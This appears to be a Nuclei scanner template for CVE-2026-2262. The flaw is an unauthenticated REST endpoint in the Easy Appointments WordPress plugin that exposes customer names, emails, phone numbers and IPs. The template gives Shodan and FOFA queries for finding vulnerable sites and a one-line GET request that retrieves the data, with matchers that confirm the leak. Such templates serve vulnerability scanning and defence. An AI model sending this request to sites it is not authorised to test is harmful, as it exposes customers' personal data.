id: CVE-2026-2262 info: name: Easy Appointments <= 3.12.21 - Information Disclosure author: 0x_Akoko severity: high description: | Easy Appointments WordPress plugin <= 3.12.21 contains a sensitive information exposure caused by an unauthenticated REST API endpoint /wp-json/wp/v2/eablocks/ea_appointments/ registered with permission_callback allowing unrestricted access, letting unauthenticated attackers extract sensitive customer appointment data. impact: | Unauthenticated attackers can access sensitive customer data, including names, emails, phone numbers, IPs, descriptions, and pricing, risking privacy and data leakage. remediation: | Update to the latest version of Easy Appointments plugin. reference: - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments/easy-appointments-31221-unauthenticated-sensitive-information-exposure-via-rest-api - https://nvd.nist.gov/vuln/detail/CVE-2026-2262 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2026-2262 epss-score: 0.0239 epss-percentile: 0.82223 cwe-id: CWE-284 cpe: cpe:2.3:a:motopress:easy_appointments:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 fofa-query: body="/wp-content/plugins/easy-appointments/" shodan-query: http.html:"/wp-content/plugins/easy-appointments/" tags: cve,cve2026,wordpress,wp,wp-plugin,exposure,easy-appointments http: - raw: - | GET /wp-json/wp/v2/eablocks/ea_appointments/ HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - "contains_all(body, 'email', 'phone', 'ip', 'name')" - "contains(content_type, 'application/json')" - "status_code == 200" condition: and # digest: 4b0a00483046022100b5392d4ff9cace9e4b27a16fe17ca480c6f2dc95ce44a554177c50339f16f410022100d993d8b8403a89d436d4a21e41bfa70e83fafd3b5e70d62f42ea3da880f23ea9:922c64590222798bb761d5b6d8e72950